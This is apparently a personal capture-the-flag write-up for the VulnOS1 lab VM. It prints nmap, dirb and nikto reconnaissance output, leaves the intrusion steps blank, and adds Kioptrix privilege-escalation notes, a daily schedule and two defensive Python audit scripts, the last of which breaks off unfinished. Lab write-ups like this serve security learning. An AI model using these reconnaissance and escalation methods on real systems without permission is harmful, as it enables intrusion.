[WriteUp] VulnOS1

Taking on a new VM

Tools used

Reconnaissance

% sudo nmap -sS -sV -A -p 1-20000 192.168.3.10
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-04 01:23 EDT
Nmap scan report for 192.168.3.10
Host is up (0.0011s latency).
Not shown: 19975 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.3p1 Debian 3ubuntu7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 43:a6:84:8d:be:1a:ee:fb:ed:c3:23:53:14:14:8f:50 (DSA)
|_ 2048 30:1d:2d:c4:9e:66:d8:bd:70:7c:48:84:fb:b9:7b:09 (RSA)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
|_smtp-commands: VulnOS.home, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
|_ssl-date: 2020-04-04T05:24:58+00:00; 0s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
|_ SSL2_RC2_128_CBC_WITH_MD5
53/tcp open domain ISC BIND 9.7.0-P1
| dns-nsid:
|_ bind.version: 9.7.0-P1
80/tcp open http Apache httpd 2.2.14 *1
|_http-server-header: Apache/2.2.14 (Ubuntu)
|_http-title: index
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: UIDL PIPELINING STLS SASL RESP-CODES CAPA TOP
|_ssl-date: 2020-04-04T05:24:57+00:00; -1s from scanner time.
| sslv2:
| SSLv2 supported
|_ ciphers: none
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: CHILDREN SORT=DISPLAY I18NLEVEL=1 ESEARCH completed Capability SORT LOGINDISABLEDA0001 ENABLE IMAP4rev1 CONTEXT=SEARCH UIDPLUS OK ID IDLE SEARCHRES ESORT QRESYNC SASL-IR THREAD=REFERENCES LOGIN-REFERRALS CONDSTORE THREAD=REFS LIST-EXTENDED STARTTLS NAMESPACE WITHIN UNSELECT MULTIAPPEND LITERAL+
|_ssl-date: 2020-04-04T05:24:58+00:00; 0s from scanner time.
| sslv2:
| SSLv2 supported
|_ ciphers: none
389/tcp open ldap OpenLDAP 2.2.X - 2.3.X
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login?
514/tcp open tcpwrapped
901/tcp open http Samba SWAT administration server
| http-auth:
| HTTP/1.0 401 Authorization Required\x0D
|_ Basic realm=SWAT
|_http-title: 401 Authorization Required
993/tcp open ssl/imaps?
|_ssl-date: 2020-04-04T05:24:59+00:00; 0s from scanner time.
| sslv2:
| SSLv2 supported
|_ ciphers: none
995/tcp open ssl/pop3s?
|_ssl-date: 2020-04-04T05:24:57+00:00; 0s from scanner time.
| sslv2:
| SSLv2 supported
|_ ciphers: none
2000/tcp open sieve Dovecot timsieved
2049/tcp open nfs 2-4 (RPC #100003)
3306/tcp open mysql MySQL 5.1.73-0ubuntu0.10.04.1
| mysql-info:
| Protocol: 10
| Version: 5.1.73-0ubuntu0.10.04.1
| Thread ID: 311
| Capabilities flags: 63487
| Some Capabilities: IgnoreSpaceBeforeParenthesis, Speaks41ProtocolNew, DontAllowDatabaseTableColumn, LongColumnFlag, Speaks41ProtocolOld, SupportsCompression, Support41Auth, FoundRows, IgnoreSigpipes, InteractiveClient, LongPassword, ODBCClient, SupportsLoadDataLocal, ConnectWithDatabase, SupportsTransactions
| Status: Autocommit
|_ Salt: 0iEZt\LIgL(#q5R{8D+I
3632/tcp open tcpwrapped
6667/tcp open irc IRCnet ircd
| irc-info:
| users: 1
| servers: 1
| chans: 15
| lusers: 1
| lservers: 0
| server: irc.localhost
| version: 2.11.2p1. irc.localhost 000A
| uptime: 0 days, 0:04:05
| source ident: NONE or BLOCKED
| source host: 192.168.3.27
|_ error: Closing Link: wisjlfego[~nmap@192.168.3.27] ()
8070/tcp open ucs-isc?
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
|_ Potentially risky methods: PUT DELETE
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat
10000/tcp open http MiniServ 0.01 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
MAC Address: 08:00:27:43:06:19 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6.32
OS details: Linux 2.6.32
Network Distance: 1 hop
Service Info: Hosts: VulnOS.home, irc.localhost; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: VULNOS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE
HOP RTT ADDRESS
1 1.11 ms 192.168.3.10

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 246.76 seconds

As a result, the live services are:

22/tcp open ssh OpenSSH 5.3p1 Debian 3ubuntu7 (Ubuntu Linux; protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.7.0-P1
80/tcp open http Apache httpd 2.2.14 *2
110/tcp open pop3 Dovecot pop3d
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
389/tcp open ldap OpenLDAP 2.2.X - 2.3.X
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login?
514/tcp open tcpwrapped
901/tcp open http Samba SWAT administration server
993/tcp open ssl/imaps?
995/tcp open ssl/pop3s?
2000/tcp open sieve Dovecot timsieved
2049/tcp open nfs 2-4 (RPC #100003)
3306/tcp open mysql MySQL 5.1.73-0ubuntu0.10.04.1
3632/tcp open tcpwrapped
6667/tcp open irc IRCnet ircd
8070/tcp open ucs-isc?
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
10000/tcp open http MiniServ 0.01 (Webmin httpd)

Honestly, it's so wide open it's almost off-putting.

I think there are quite a few possible routes in.
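As an added example (not code from this writeup), here is a small Python triage of the nmap service list above, and of the Kioptrix Level 1.1 scan later on the page, that turns the output into a defender's fix list: cleartext remote access (telnet, rexec), SSLv2 on the mail daemons, STARTTLS offered but not enforced, PUT/DELETE on Tomcat, the SWAT/Webmin/Tomcat admin interfaces, NFS, and an SSH server still negotiating protocol 1. The scan excerpts inside the block are constructed from the page's own output, trimmed to the lines the parser uses.

```python
"""Triage nmap -sV normal output into remediation findings.

Added example for this writeup, not the author's code: it parses the
"PORT STATE SERVICE VERSION" table plus the indented NSE lines and turns
them into the exposures a defender would fix first.
"""
import re
from collections import namedtuple

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
CLEARTEXT = {"telnet", "exec", "login", "shell", "ftp"}   # authentication in the clear by design
STARTTLS_OPTIONAL = {"smtp", "pop3", "imap"}              # plaintext ports that may only offer STARTTLS
ADMIN_MARKERS = ("swat", "webmin", "tomcat")               # banner substrings of admin web interfaces

# notes holds the NSE script lines ("| ..." / "|_ ...") printed under a port.
Port = namedtuple("Port", "number proto service version notes")


def parse_nmap(text):
    """Return the open ports listed in nmap's human-readable output."""
    ports, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        m = PORT_RE.match(line)
        if m:
            current = None
            if m.group(3) == "open":
                current = Port(int(m.group(1)), m.group(2), m.group(4), m.group(5), [])
                ports.append(current)
        elif line.startswith("|") and current is not None:
            current.notes.append(line.lstrip("|_ ").strip())
        else:
            current = None  # "MAC Address:", "Host script results:", ... end the table
    return ports


def triage(ports):
    """Return (port, category, message) findings for the open ports."""
    findings = []
    for p in ports:
        blob = " ".join(p.notes).lower()
        banner = p.version.lower()

        def add(category, message):
            findings.append((p.number, category, message))

        if p.service in CLEARTEXT:
            add("cleartext", f"{p.service}: credentials cross the wire unencrypted; replace with SSH")
        if p.service in STARTTLS_OPTIONAL and re.search(r"\b(starttls|stls)\b", blob):
            add("starttls-optional", f"{p.service}: STARTTLS offered but not required; refuse plaintext logins")
        if "sslv2 supported" in blob:
            add("sslv2", "SSLv2 accepted; disable SSLv2/SSLv3 in the daemon's TLS settings")
        if "potentially risky methods" in blob:
            add("http-write-methods", "PUT/DELETE enabled; disable them or require authentication")
        if any(k in banner for k in ADMIN_MARKERS):
            add("admin-interface", f"admin interface reachable from the network: {p.version}")
        if p.service == "nfs":
            add("nfs", "NFS exported; review /etc/exports for open host lists and no_root_squash")
        if p.service == "ssh" and "protocol 1.99" in banner:
            add("ssh-v1", "server still negotiates SSH protocol 1; set Protocol 2 and upgrade")
    return findings


# Constructed excerpt of the VulnOS1 scan shown above (NSE lines abridged).
SAMPLE_VULNOS = """\
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.3p1 Debian 3ubuntu7 (Ubuntu Linux; protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
|_smtp-commands: VulnOS.home, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
| sslv2:
|   SSLv2 supported
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: UIDL PIPELINING STLS SASL RESP-CODES CAPA TOP
512/tcp open exec netkit-rsh rexecd
901/tcp open http Samba SWAT administration server
2049/tcp open nfs 2-4 (RPC #100003)
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
|_  Potentially risky methods: PUT DELETE
10000/tcp open http MiniServ 0.01 (Webmin httpd)
MAC Address: 08:00:27:43:06:19 (Oracle VirtualBox virtual NIC)
Host script results:
|_nbstat: NetBIOS name: VULNOS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
"""

# Constructed excerpt of the Kioptrix Level 1.1 scan further down the page.
SAMPLE_KIOPTRIX = """\
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
3306/tcp open mysql MySQL (unauthorized)
"""

if __name__ == "__main__":
    for name, scan in (("VulnOS1", SAMPLE_VULNOS), ("Kioptrix 1.1", SAMPLE_KIOPTRIX)):
        print(f"== {name}")
        for port, category, message in triage(parse_nmap(scan)):
            print(f"{port:>6}  {category:<20} {message}")
```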

 

 

Next, dirb

% dirb http://192.168.3.10

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sat Apr 4 01:31:10 2020
URL_BASE: http://192.168.3.10/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.3.10/ ----
+ http://192.168.3.10/.htaccess (CODE:200|SIZE:501)
+ http://192.168.3.10/cgi-bin/ (CODE:403|SIZE:288)
==> DIRECTORY: http://192.168.3.10/imgs/
+ http://192.168.3.10/index (CODE:200|SIZE:745)
+ http://192.168.3.10/index.html (CODE:200|SIZE:745)
+ http://192.168.3.10/index2 (CODE:200|SIZE:1066)
==> DIRECTORY: http://192.168.3.10/javascript/
==> DIRECTORY: http://192.168.3.10/mediawiki/
==> DIRECTORY: http://192.168.3.10/phpldapadmin/
==> DIRECTORY: http://192.168.3.10/phpmyadmin/
==> DIRECTORY: http://192.168.3.10/phppgadmin/
+ http://192.168.3.10/server-status (CODE:403|SIZE:293)

---- Entering directory: http://192.168.3.10/imgs/ ----
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.3.10/javascript/ ----
==> DIRECTORY: http://192.168.3.10/javascript/jquery/

---- Entering directory: http://192.168.3.10/mediawiki/ ----
==> DIRECTORY: http://192.168.3.10/mediawiki/config/
==> DIRECTORY: http://192.168.3.10/mediawiki/extensions/
==> DIRECTORY: http://192.168.3.10/mediawiki/images/
+ http://192.168.3.10/mediawiki/includes (CODE:403|SIZE:298)
+ http://192.168.3.10/mediawiki/index.php (CODE:301|SIZE:0)
+ http://192.168.3.10/mediawiki/languages (CODE:403|SIZE:299)
+ http://192.168.3.10/mediawiki/maintenance (CODE:403|SIZE:301)
==> DIRECTORY: http://192.168.3.10/mediawiki/skins/

---- Entering directory: http://192.168.3.10/phpldapadmin/ ----
==> DIRECTORY: http://192.168.3.10/phpldapadmin/css/
==> DIRECTORY: http://192.168.3.10/phpldapadmin/images/
+ http://192.168.3.10/phpldapadmin/index.php (CODE:200|SIZE:4731)
==> DIRECTORY: http://192.168.3.10/phpldapadmin/js/

---- Entering directory: http://192.168.3.10/phpmyadmin/ ----
+ http://192.168.3.10/phpmyadmin/favicon.ico (CODE:200|SIZE:18902)
+ http://192.168.3.10/phpmyadmin/index.php (CODE:200|SIZE:8625)
==> DIRECTORY: http://192.168.3.10/phpmyadmin/js/
==> DIRECTORY: http://192.168.3.10/phpmyadmin/lang/
+ http://192.168.3.10/phpmyadmin/libraries (CODE:403|SIZE:300)
+ http://192.168.3.10/phpmyadmin/phpinfo.php (CODE:200|SIZE:0)
+ http://192.168.3.10/phpmyadmin/setup (CODE:401|SIZE:479)
==> DIRECTORY: http://192.168.3.10/phpmyadmin/themes/

---- Entering directory: http://192.168.3.10/phppgadmin/ ----
==> DIRECTORY: http://192.168.3.10/phppgadmin/classes/
==> DIRECTORY: http://192.168.3.10/phppgadmin/conf/
==> DIRECTORY: http://192.168.3.10/phppgadmin/help/
==> DIRECTORY: http://192.168.3.10/phppgadmin/images/
+ http://192.168.3.10/phppgadmin/index.php (CODE:200|SIZE:1012)
+ http://192.168.3.10/phppgadmin/info.php (CODE:200|SIZE:19)
==> DIRECTORY: http://192.168.3.10/phppgadmin/lang/
==> DIRECTORY: http://192.168.3.10/phppgadmin/libraries/
+ http://192.168.3.10/phppgadmin/robots.txt (CODE:200|SIZE:221)
==> DIRECTORY: http://192.168.3.10/phppgadmin/sql/
==> DIRECTORY: http://192.168.3.10/phppgadmin/themes/

---- Entering directory: http://192.168.3.10/javascript/jquery/ ----
+ http://192.168.3.10/javascript/jquery/jquery (CODE:200|SIZE:120653)

---- Entering directory: http://192.168.3.10/mediawiki/config/ ----
+ http://192.168.3.10/mediawiki/config/index.php (CODE:200|SIZE:3009)

---- Entering directory: http://192.168.3.10/mediawiki/extensions/ ----
+ http://192.168.3.10/mediawiki/extensions/README (CODE:200|SIZE:583)

---- Entering directory: http://192.168.3.10/mediawiki/images/ ----

---- Entering directory: http://192.168.3.10/mediawiki/skins/ ----
==> DIRECTORY: http://192.168.3.10/mediawiki/skins/common/
==> DIRECTORY: http://192.168.3.10/mediawiki/skins/disabled/
==> DIRECTORY: http://192.168.3.10/mediawiki/skins/simple/

---- Entering directory: http://192.168.3.10/phpldapadmin/css/ ----
==> DIRECTORY: http://192.168.3.10/phpldapadmin/css/default/

---- Entering directory: http://192.168.3.10/phpldapadmin/images/ ----
==> DIRECTORY: http://192.168.3.10/phpldapadmin/images/default/
+ http://192.168.3.10/phpldapadmin/images/favicon.ico (CODE:200|SIZE:902)

---- Entering directory: http://192.168.3.10/phpldapadmin/js/ ----

---- Entering directory: http://192.168.3.10/phpmyadmin/js/ ----

---- Entering directory: http://192.168.3.10/phpmyadmin/lang/ ----

---- Entering directory: http://192.168.3.10/phpmyadmin/themes/ ----
==> DIRECTORY: http://192.168.3.10/phpmyadmin/themes/original/

---- Entering directory: http://192.168.3.10/phppgadmin/classes/ ----
==> DIRECTORY: http://192.168.3.10/phppgadmin/classes/database/
==> DIRECTORY: http://192.168.3.10/phppgadmin/classes/plugins/

---- Entering directory: http://192.168.3.10/phppgadmin/conf/ ----

---- Entering directory: http://192.168.3.10/phppgadmin/help/ ----

---- Entering directory: http://192.168.3.10/phppgadmin/images/ ----
==> DIRECTORY: http://192.168.3.10/phppgadmin/images/themes/

---- Entering directory: http://192.168.3.10/phppgadmin/lang/ ----
+ http://192.168.3.10/phppgadmin/lang/Makefile (CODE:200|SIZE:7373)

---- Entering directory: http://192.168.3.10/phppgadmin/libraries/ ----
==> DIRECTORY: http://192.168.3.10/phppgadmin/libraries/adodb/

---- Entering directory: http://192.168.3.10/phppgadmin/sql/ ----

---- Entering directory: http://192.168.3.10/phppgadmin/themes/ ----
==> DIRECTORY: http://192.168.3.10/phppgadmin/themes/default/

---- Entering directory: http://192.168.3.10/mediawiki/skins/common/ ----
==> DIRECTORY: http://192.168.3.10/mediawiki/skins/common/images/

---- Entering directory: http://192.168.3.10/mediawiki/skins/disabled/ ----

---- Entering directory: http://192.168.3.10/mediawiki/skins/simple/ ----

---- Entering directory: http://192.168.3.10/phpldapadmin/css/default/ ----

---- Entering directory: http://192.168.3.10/phpldapadmin/images/default/ ----
+ http://192.168.3.10/phpldapadmin/images/default/index.php (CODE:200|SIZE:19434)

---- Entering directory: http://192.168.3.10/phpmyadmin/themes/original/ ----
==> DIRECTORY: http://192.168.3.10/phpmyadmin/themes/original/css/
==> DIRECTORY: http://192.168.3.10/phpmyadmin/themes/original/img/

---- Entering directory: http://192.168.3.10/phppgadmin/classes/database/ ----

---- Entering directory: http://192.168.3.10/phppgadmin/classes/plugins/ ----

---- Entering directory: http://192.168.3.10/phppgadmin/images/themes/ ----
==> DIRECTORY: http://192.168.3.10/phppgadmin/images/themes/default/

---- Entering directory: http://192.168.3.10/phppgadmin/libraries/adodb/ ----
==> DIRECTORY: http://192.168.3.10/phppgadmin/libraries/adodb/drivers/
==> DIRECTORY: http://192.168.3.10/phppgadmin/libraries/adodb/lang/

---- Entering directory: http://192.168.3.10/phppgadmin/themes/default/ ----

---- Entering directory: http://192.168.3.10/mediawiki/skins/common/images/ ----
==> DIRECTORY: http://192.168.3.10/mediawiki/skins/common/images/ar/
==> DIRECTORY: http://192.168.3.10/mediawiki/skins/common/images/de/
==> DIRECTORY: http://192.168.3.10/mediawiki/skins/common/images/fa/
==> DIRECTORY: http://192.168.3.10/mediawiki/skins/common/images/icons/

---- Entering directory: http://192.168.3.10/phpmyadmin/themes/original/css/ ----

---- Entering directory: http://192.168.3.10/phpmyadmin/themes/original/img/ ----

---- Entering directory: http://192.168.3.10/phppgadmin/images/themes/default/ ----

---- Entering directory: http://192.168.3.10/phppgadmin/libraries/adodb/drivers/ ----

---- Entering directory: http://192.168.3.10/phppgadmin/libraries/adodb/lang/ ----

---- Entering directory: http://192.168.3.10/mediawiki/skins/common/images/ar/ ----

---- Entering directory: http://192.168.3.10/mediawiki/skins/common/images/de/ ----

---- Entering directory: http://192.168.3.10/mediawiki/skins/common/images/fa/ ----

---- Entering directory: http://192.168.3.10/mediawiki/skins/common/images/icons/ ----

-----------------
END_TIME: Sat Apr 4 01:35:21 2020
DOWNLOADED: 212152 - FOUND: 25

As a result, the following URLs turned out to be live:

+ http://192.168.3.10/.htaccess (CODE:200|SIZE:501)
+ http://192.168.3.10/cgi-bin/ (CODE:403|SIZE:288)
+ http://192.168.3.10/index (CODE:200|SIZE:745)
+ http://192.168.3.10/index.html (CODE:200|SIZE:745)
+ http://192.168.3.10/index2 (CODE:200|SIZE:1066)
==> DIRECTORY: http://192.168.3.10/mediawiki/
==> DIRECTORY: http://192.168.3.10/phpldapadmin/
==> DIRECTORY: http://192.168.3.10/phpmyadmin/
==> DIRECTORY: http://192.168.3.10/phppgadmin/


---- Entering directory: http://192.168.3.10/mediawiki/ ----
==> DIRECTORY: http://192.168.3.10/mediawiki/config/
==> DIRECTORY: http://192.168.3.10/mediawiki/extensions/
==> DIRECTORY: http://192.168.3.10/mediawiki/images/
+ http://192.168.3.10/mediawiki/includes (CODE:403|SIZE:298)
+ http://192.168.3.10/mediawiki/index.php (CODE:301|SIZE:0)
+ http://192.168.3.10/mediawiki/languages (CODE:403|SIZE:299)
+ http://192.168.3.10/mediawiki/maintenance (CODE:403|SIZE:301)
==> DIRECTORY: http://192.168.3.10/mediawiki/skins/

---- Entering directory: http://192.168.3.10/phpldapadmin/ ----
==> DIRECTORY: http://192.168.3.10/phpldapadmin/css/
==> DIRECTORY: http://192.168.3.10/phpldapadmin/images/
+ http://192.168.3.10/phpldapadmin/index.php (CODE:200|SIZE:4731)
==> DIRECTORY: http://192.168.3.10/phpldapadmin/js/

---- Entering directory: http://192.168.3.10/phpmyadmin/ ----
+ http://192.168.3.10/phpmyadmin/index.php (CODE:200|SIZE:8625)
+ http://192.168.3.10/phpmyadmin/phpinfo.php (CODE:200|SIZE:0)

---- Entering directory: http://192.168.3.10/phppgadmin/ ---- 
==> DIRECTORY: http://192.168.3.10/phppgadmin/conf/
+ http://192.168.3.10/phppgadmin/index.php (CODE:200|SIZE:1012)
+ http://192.168.3.10/phppgadmin/info.php (CODE:200|SIZE:19)
+ http://192.168.3.10/phppgadmin/robots.txt (CODE:200|SIZE:221)
==> DIRECTORY: http://192.168.3.10/phppgadmin/sql/

---- Entering directory: http://192.168.3.10/mediawiki/config/ ----
+ http://192.168.3.10/mediawiki/config/index.php (CODE:200|SIZE:3009)

==> DIRECTORY: http://192.168.3.10/phppgadmin/classes/database/
==> DIRECTORY: http://192.168.3.10/phppgadmin/classes/plugins/

---- Entering directory: http://192.168.3.10/phppgadmin/conf/ ----
+ http://192.168.3.10/phppgadmin/lang/Makefile (CODE:200|SIZE:7373)

+ http://192.168.3.10/phpldapadmin/images/default/index.php (CODE:200|SIZE:19434)

Next, I also checked with nikto.

% nikto -h 192.168.3.10
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.3.10
+ Target Hostname: 192.168.3.10
+ Target Port: 80
+ Start Time: 2020-04-04 01:29:12 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.14 (Ubuntu)
+ Server may leak inodes via ETags, header found with file /, inode: 1062203, size: 745, mtime: Sat Mar 29 20:35:52 2014
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Apache/2.2.14 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3268: /doc/: Directory indexing found.
+ OSVDB-48: /doc/: The /doc/ directory is browsable. This may be /usr/doc.
+ OSVDB-3268: /imgs/: Directory indexing found.
+ OSVDB-3092: /imgs/: This might be interesting...
+ Retrieved x-powered-by header: PHP/5.3.2-1ubuntu4.23
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3093: /.htaccess: Contains configuration and/or authorization information
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ Cookie 5d89dac18813e15aa2f75788275e3588 created without the httponly flag
+ /phpldapadmin/: Admin login page/section found.
+ Cookie PPA_ID created without the httponly flag
+ /phppgadmin/: Admin login page/section found.
+ /phpmyadmin/: phpMyAdmin directory found
+ OSVDB-3092: /phpmyadmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ 8877 requests: 0 error(s) and 23 item(s) reported on remote host
+ End Time: 2020-04-04 01:29:44 (GMT-4) (32 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Then, following the nmap results, I ran nikto again against a different port.

% nikto -h 192.168.3.10 -p 8080
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.3.10
+ Target Hostname: 192.168.3.10
+ Target Port: 8080
+ Start Time: 2020-04-04 01:38:59 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache-Coyote/1.1
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ /: Appears to be a default Apache Tomcat install.
+ /examples/servlets/index.html: Apache Tomcat default JSP pages present.
+ Cookie JSESSIONID created without the httponly flag
+ OSVDB-3720: /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users.
+ /manager/html: Default Tomcat Manager / Host Manager interface found
+ /manager/status: Default Tomcat Server Status interface found
+ 8221 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time: 2020-04-04 01:39:31 (GMT-4) (32 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Intrusion

 

 

Privilege escalation

Hack The Box is rough ()

Last time I'd decided VulnHub was easier to get on with, so I'd gone back to that,

but I'd put in a bit of effort, so I figured maybe I could get somewhere on Hack The Box now!?

So I gave it a try, and

Nope ⭐️

I don't know, I guess I'm fundamentally lacking skills...

Guess there's nothing for it but to read Hack The Box writeups...!

That's all.

My recent schedule

This is completely unrelated to the topics so far, but

I want to write out my current daily schedule.

0:00-6:00 Sleep

6:00-8:00 Morning prep, housework (1)

8:00-9:00 Drop the kid off at daycare, housework (2)

9:00-12:00 Working from home

12:00-13:00 Lunch

13:00-18:00 Working from home

18:00-20:00 Dinner, bathing the kid, housework (3)

20:00-21:00 Putting the kid to bed

(sometimes I fall asleep too, until 23:00)

23:00-24:00 Brushing teeth, bath, housework (4)

24:00- Sleep (sometimes an hour fiddling with the PC)

 

Huh?

That's pretty packed, isn't it...?

Before, commuting time was on top of this,

and that was my own time.

Child-rearing, formidable...

* But they're so cute that part of me forgives everything.

Kioptrix 1.1 (LinEnum.sh, an alternative privilege escalation, ps)

 

Checking various things

About LinEnum.sh

When escalating privileges, it's hard to decide which files to look at.

With LinEnum you can check all sorts of permission-related things,

→ and from there work toward privilege escalation.

 

 

Alternative privilege escalation

This time I did the privilege escalation using a CentOS vulnerability,

but apparently there's also a kernel exploit (Linux kernel 2.6 < 2.6.19 (32bit) ip_append_data() local ring0 root exploit).

I'll try doing the privilege escalation again using that.

→ I was being dumb, that IS the CentOS vulnerability!

Checking processes with ps

As above, checking processes with ps is also useful for finding processes and the like that could be used for privilege escalation.
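The permission items LinEnum reports and the ps review above come down to a few concrete checks. As an added example (not LinEnum itself and not the author's code), here is a Python hardening audit that walks a filesystem for setuid/setgid executables missing from an expected baseline and for world-writable files or non-sticky directories, and reads /proc (the data ps shows) for root processes whose executable other users can modify; the setuid baseline and the throwaway demo tree it builds are assumptions for the demo.

```python
"""Hardening audit of the items a LinEnum-style sweep and a ps review surface.

Added example, not LinEnum and not the author's code. It walks a filesystem for
setuid/setgid executables missing from an expected baseline and for world-writable
files or non-sticky directories, then reads /proc (what ps shows) for root
processes whose executable other users can modify. Baseline and demo tree are assumptions.
"""
import os
import stat
import tempfile

# Setuid binaries a stock install legitimately carries (assumed baseline; take the
# real list from the distribution's package manifest).
EXPECTED_SUID = {"/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su", "/bin/su",
                 "/bin/mount", "/bin/umount", "/bin/ping"}
SKIP_DIRS = {"/proc", "/sys", "/dev"}  # pseudo-filesystems, never audited


def audit_tree(root, expected_suid=EXPECTED_SUID):
    """Return sorted (category, root-relative path, mode) findings under root."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in SKIP_DIRS]
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            try:
                mode = os.lstat(path).st_mode  # lstat: a symlink is judged by its own mode
            except OSError:
                continue
            rel = "/" + os.path.relpath(path, root)
            perm = oct(stat.S_IMODE(mode))
            if stat.S_ISREG(mode) and mode & (stat.S_ISUID | stat.S_ISGID) and mode & 0o111:
                if rel not in expected_suid:
                    findings.append(("setuid/setgid", rel, perm))
            if mode & stat.S_IWOTH:
                if stat.S_ISDIR(mode) and not mode & stat.S_ISVTX:
                    findings.append(("world-writable-dir", rel, perm))  # anyone can swap entries
                elif stat.S_ISREG(mode):
                    findings.append(("world-writable-file", rel, perm))
    return sorted(findings)


def audit_processes(proc="/proc"):
    """Return (pid, exe, mode) for uid-0 processes whose binary is group/world-writable."""
    findings = []
    for pid in os.listdir(proc):
        if not pid.isdigit():
            continue
        base = os.path.join(proc, pid)
        try:
            with open(os.path.join(base, "status")) as fh:
                uid = int(next(l for l in fh if l.startswith("Uid:")).split()[1])
            exe = os.readlink(os.path.join(base, "exe"))
            mode = os.stat(exe).st_mode
        except (OSError, StopIteration, ValueError):
            continue  # kernel thread, vanished process, or not permitted to look
        if uid == 0 and mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append((int(pid), exe, oct(stat.S_IMODE(mode))))
    return sorted(findings)


def build_demo(base):
    """Construct a small fake root filesystem and /proc under base (demo data only)."""
    old_umask = os.umask(0o022)  # make directory modes independent of the caller's umask

    def touch(rel, mode):
        path = os.path.join(base, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        open(path, "w").close()
        os.chmod(path, mode)
        return path

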